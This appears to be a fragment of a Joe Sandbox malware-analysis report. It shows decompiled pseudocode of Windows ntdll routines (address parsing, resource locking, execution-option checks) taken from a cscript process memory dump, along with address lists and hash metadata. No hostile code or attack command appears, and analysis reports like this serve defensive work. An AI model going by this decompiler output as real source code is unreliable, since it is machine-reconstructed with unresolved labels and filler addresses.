                                        0x02653f7a
                                        0x02653f7c
                                        0x02653f7e
                                        0x02653f86
                                        0x02637f39
                                        0x02637f47
                                        0x02637f47
                                        0x02637f37
                                        0x02637f37
                                        0x00000000

                                        APIs
                                        • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02653F12
                                        Strings
                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02653EC4
                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02653F75
                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02653F4A
                                        • ExecuteOptions, xrefs: 02653F04
                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0265E2FB
                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 0265E345
                                        • Execute=1, xrefs: 02653F5E
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: BaseDataModuleQuery
                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                        • API String ID: 3901378454-484625025
                                        • Opcode ID: 3688043c1f0ff6746d8d52582c20bf9de47dbfa0e063fbbf18fdb4dddb882e69
                                        • Instruction ID: 54de242100e78dee3c6bcd36c32cef47f6309f2d69836efb162e642aa8fc9331
                                        • Opcode Fuzzy Hash: 3688043c1f0ff6746d8d52582c20bf9de47dbfa0e063fbbf18fdb4dddb882e69
                                        • Instruction Fuzzy Hash: F641D87268021CBAEF219E94DCD9FDFB3BDAF14704F0004ADA905E6180EB70AA459F65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02640B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E02640B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02618980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0260DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02640CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02640CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E026406BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E026406BA(_t135, _t178) == 0 || E02640A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02640CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02640CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E026406BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E026406BA(_t124, _t142) == 0 || E02640A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                        0x02640b21
                                        0x02640b24
                                        0x02640b27
                                        0x02640b2a
                                        0x02640b2d
                                        0x02640b30
                                        0x02640b33
                                        0x02640b36
                                        0x02640b39
                                        0x02640b3e
                                        0x02640c65
                                        0x02640c68
                                        0x02640c6a
                                        0x02640c6f
                                        0x0266eb42
                                        0x00000000
                                        0x00000000
                                        0x0266eb48
                                        0x0266eb48
                                        0x02640c75
                                        0x02640c7a
                                        0x0266eb54
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0266eb5a
                                        0x02640c80
                                        0x02640c84
                                        0x0266eb98
                                        0x00000000
                                        0x00000000
                                        0x0266eba6
                                        0x02640cb8
                                        0x02640cba
                                        0x02640cd3
                                        0x02640cda
                                        0x02640ce4
                                        0x02640ce9
                                        0x00000000
                                        0x02640cec
                                        0x02640c8c
                                        0x0266eb63
                                        0x00000000
                                        0x00000000
                                        0x0266eb70
                                        0x0266eb75
                                        0x0266eb7d
                                        0x00000000
                                        0x00000000
                                        0x0266eb8c
                                        0x00000000
                                        0x0266eb8c
                                        0x02640c96
                                        0x00000000
                                        0x00000000
                                        0x02640ca2
                                        0x02640cac
                                        0x02640cb4
                                        0x00000000
                                        0x00000000
                                        0x02640b44
                                        0x02640b47
                                        0x02640b49
                                        0x00000000
                                        0x00000000
                                        0x02640b4f
                                        0x02640b50
                                        0x00000000
                                        0x00000000
                                        0x02640b56
                                        0x02640b62
                                        0x02640b7c
                                        0x02640bac
                                        0x02640a0f
                                        0x0266eaaa
                                        0x00000000
                                        0x0266eac4
                                        0x0266eac4
                                        0x02640bd0
                                        0x02640bd0
                                        0x02640bd4
                                        0x02640bd9
                                        0x00000000
                                        0x00000000
                                        0x02640bdb
                                        0x02640be0
                                        0x0266eb0e
                                        0x02640a1a
                                        0x00000000
                                        0x02640a1a
                                        0x0266eb1a
                                        0x0266eb1f
                                        0x0266eb27
                                        0x00000000
                                        0x00000000
                                        0x0266eb36
                                        0x00000000
                                        0x0266eb36
                                        0x02640bea
                                        0x00000000
                                        0x00000000
                                        0x02640bf6
                                        0x02640c00
                                        0x02640c03
                                        0x02640c0b
                                        0x00000000
                                        0x02640c0b
                                        0x0266eaaa
                                        0x00000000
                                        0x02640a15
                                        0x02640bb6
                                        0x00000000
                                        0x02640bc6
                                        0x02640bc6
                                        0x02640bcb
                                        0x02640c15
                                        0x00000000
                                        0x00000000
                                        0x02640c1d
                                        0x02640c20
                                        0x02640c21
                                        0x02640c24
                                        0x02640c24
                                        0x02640c26
                                        0x00000000
                                        0x02640c26
                                        0x02640bcd
                                        0x00000000
                                        0x02640bcd
                                        0x02640b89
                                        0x02640b89
                                        0x02640b90
                                        0x00000000
                                        0x00000000
                                        0x02640b96
                                        0x00000000
                                        0x02640b96
                                        0x02640a04
                                        0x02640a04
                                        0x02640b9a
                                        0x02640b9a
                                        0x02640b9b
                                        0x02640b9f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x02640ba5
                                        0x02640ac7
                                        0x02640aca
                                        0x0266eacf
                                        0x00000000
                                        0x0266eade
                                        0x0266eade
                                        0x0266eae3
                                        0x00000000
                                        0x00000000
                                        0x0266eaf3
                                        0x0266eaf6
                                        0x0266eaf7
                                        0x0266eafe
                                        0x0266eb01
                                        0x00000000
                                        0x0266eb01
                                        0x0266eacf
                                        0x02640ad0
                                        0x02640ad4
                                        0x00000000
                                        0x00000000
                                        0x02640ada
                                        0x02640ae6
                                        0x02640c34
                                        0x00000000
                                        0x02640c47
                                        0x02640c49
                                        0x02640c4a
                                        0x02640c4e
                                        0x02640c51
                                        0x02640c54
                                        0x02640c57
                                        0x02640c5a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x02640c60
                                        0x02640afb
                                        0x02640afe
                                        0x02640b02
                                        0x02640b05
                                        0x02640b08
                                        0x00000000
                                        0x02640b08
                                        0x02640ae6
                                        0x02640b44
                                        0x026409f8
                                        0x026409f8
                                        0x026409f9
                                        0x00000000
                                        0x00000000
                                        0x0266eaa0
                                        0x00000000

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: __fassign
                                        • String ID: .$:$:
                                        • API String ID: 3965848254-2308638275
                                        • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                        • Instruction ID: aa545d77332e612abe207232f6b742eb028480b4fc38fd9006a74203982d02fa
                                        • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                        • Instruction Fuzzy Hash: 02A18E71D0022ADECB2CDF68C8446BEB7B5AF15308F24846ADA82A7281DF359685CB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02640554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 50%
                                        			E02640554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026e01c0;
									_push(_t144);
									_push(0);
									_t51 = E025FF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02644FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02653F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02653F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0268217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02653F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02643915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026e01c0;
												_push(_t138);
												_push(0);
												_t58 = E025FF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02644FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02653F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02653F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0268217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02653F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02643915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02625384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E025FF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02643915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E025FF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02643915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E025FF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02643915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E02625329(_t110, _t138);
																_t69 = E026253A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                        0x0264055a
                                        0x0264055d
                                        0x02640563
                                        0x02640566
                                        0x026405d8
                                        0x026405e2
                                        0x026405e5
                                        0x00000000
                                        0x026405e7
                                        0x026405e7
                                        0x026405ea
                                        0x026405f3
                                        0x026405f3
                                        0x02640568
                                        0x02640568
                                        0x02640568
                                        0x02640569
                                        0x02640569
                                        0x02640569
                                        0x0264056b
                                        0x00000000
                                        0x00000000
                                        0x0266217f
                                        0x02662183
                                        0x0266225b
                                        0x0266225f
                                        0x02662189
                                        0x0266218c
                                        0x0266218f
                                        0x02662194
                                        0x02662199
                                        0x0266219d
                                        0x026621a0
                                        0x026621a2
                                        0x026621ce
                                        0x026621ce
                                        0x026621ce
                                        0x026621d0
                                        0x026621d6
                                        0x026621de
                                        0x026621e2
                                        0x026621e8
                                        0x026621e9
                                        0x026621ec
                                        0x026621f1
                                        0x026621f6
                                        0x00000000
                                        0x00000000
                                        0x026621f8
                                        0x026621fb
                                        0x02662206
                                        0x0266220b
                                        0x0266220c
                                        0x02662217
                                        0x02662226
                                        0x0266222b
                                        0x0266222c
                                        0x0266222f
                                        0x02662232
                                        0x02662235
                                        0x02662235
                                        0x0266223a
                                        0x0266223f
                                        0x02662241
                                        0x02662243
                                        0x02662248
                                        0x02662248
                                        0x0266224d
                                        0x0266224f
                                        0x02662262
                                        0x02662263
                                        0x02662268
                                        0x02662269
                                        0x02662269
                                        0x02662269
                                        0x0266226d
                                        0x00000000
                                        0x00000000
                                        0x02662276
                                        0x02662279
                                        0x0266227e
                                        0x02662283
                                        0x02662287
                                        0x0266228a
                                        0x0266228d
                                        0x0266228f
                                        0x026622bc
                                        0x026622bc
                                        0x026622bc
                                        0x026622be
                                        0x026622c4
                                        0x026622cc
                                        0x026622d0
                                        0x026622d6
                                        0x026622d7
                                        0x026622da
                                        0x026622df
                                        0x026622e4
                                        0x00000000
                                        0x00000000
                                        0x026622e6
                                        0x026622e9
                                        0x026622f4
                                        0x026622f9
                                        0x026622fa
                                        0x02662305
                                        0x02662314
                                        0x02662319
                                        0x0266231a
                                        0x0266231d
                                        0x02662320
                                        0x02662323
                                        0x02662323
                                        0x02662328
                                        0x0266232d
                                        0x0266232f
                                        0x02662331
                                        0x02662336
                                        0x02662336
                                        0x0266233b
                                        0x0266233d
                                        0x02662350
                                        0x02662351
                                        0x02662356
                                        0x02662359
                                        0x02662359
                                        0x0266235b
                                        0x0266235d
                                        0x02625367
                                        0x0262536b
                                        0x02625372
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x02662363
                                        0x02662363
                                        0x02662369
                                        0x0266236a
                                        0x0266236c
                                        0x02662371
                                        0x02662373
                                        0x00000000
                                        0x02662379
                                        0x02662379
                                        0x0266237a
                                        0x0266237f
                                        0x0266237f
                                        0x02662385
                                        0x02662386
                                        0x02662389
                                        0x0266238e
                                        0x02662390
                                        0x02625378
                                        0x0262537c
                                        0x02662396
                                        0x02662396
                                        0x02662397
                                        0x0266239c
                                        0x026623a2
                                        0x026623a3
                                        0x026623a6
                                        0x026623ab
                                        0x026623ad
                                        0x00000000
                                        0x026623b3
                                        0x026623b3
                                        0x026623b4
                                        0x026623b9
                                        0x026623ba
                                        0x026623ba
                                        0x026623bc
                                        0x026623bf
                                        0x00000000
                                        0x00000000
                                        0x02659153
                                        0x02659158
                                        0x0265915a
                                        0x0265915e
                                        0x02659160
                                        0x00000000
                                        0x02659166
                                        0x02659166
                                        0x02659171
                                        0x02659176
                                        0x02659176
                                        0x00000000
                                        0x02659160
                                        0x026623c6
                                        0x026623ce
                                        0x026623d7
                                        0x026623d7
                                        0x026623ad
                                        0x02662390
                                        0x02662373
                                        0x0266233f
                                        0x0266233f
                                        0x00000000
                                        0x0266233f
                                        0x02662291
                                        0x02662291
                                        0x02662293
                                        0x02662295
                                        0x0266229a
                                        0x026622a1
                                        0x026622a3
                                        0x026622a7
                                        0x026622a9
                                        0x00000000
                                        0x00000000
                                        0x026622ab
                                        0x026622ad
                                        0x026622af
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x026622af
                                        0x026622b1
                                        0x026622b4
                                        0x026622b4
                                        0x026622b6
                                        0x026253be
                                        0x026253be
                                        0x026253be
                                        0x026253c0
                                        0x00000000
                                        0x00000000
                                        0x026253cb
                                        0x026253ce
                                        0x026253d0
                                        0x026253d4
                                        0x026253d6
                                        0x00000000
                                        0x026253d8
                                        0x026253e3
                                        0x026253ea
                                        0x026253ea
                                        0x00000000
                                        0x026253d6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x026622b6
                                        0x00000000
                                        0x0266228f
                                        0x02662349
                                        0x0266234d
                                        0x02662251
                                        0x02662251
                                        0x00000000
                                        0x02662251
                                        0x026621a4
                                        0x026621a4
                                        0x026621a6
                                        0x026621a8
                                        0x026621ac
                                        0x026621b6
                                        0x026621b8
                                        0x026621bc
                                        0x026621be
                                        0x00000000
                                        0x00000000
                                        0x026621c0
                                        0x026621c2
                                        0x026621c4
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x026621c4
                                        0x026621c6
                                        0x026621c6
                                        0x026621c8
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x026621c8
                                        0x026621a2
                                        0x00000000
                                        0x02662183
                                        0x0264057b
                                        0x0264057d
                                        0x02640581
                                        0x02640583
                                        0x02662178
                                        0x00000000
                                        0x02640589
                                        0x0264058f
                                        0x0264058f
                                        0x02640583
                                        0x00000000

                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02662206
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                        • API String ID: 885266447-4236105082
                                        • Opcode ID: 003f62bbb6d72c1bfbf97b267d0ec1e27f425a559fa98051e8145cbff7723ce4
                                        • Instruction ID: ec80554060445008267f5f18831bbf15f1163376156b3bd6b9ba49e3b7d0ee3b
                                        • Opcode Fuzzy Hash: 003f62bbb6d72c1bfbf97b267d0ec1e27f425a559fa98051e8145cbff7723ce4
                                        • Instruction Fuzzy Hash: 4A5139717002116BEB188E18CCD5F7673AAAF84724F21826DEE59DF384DA61EC418B94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 026414C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E026414C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
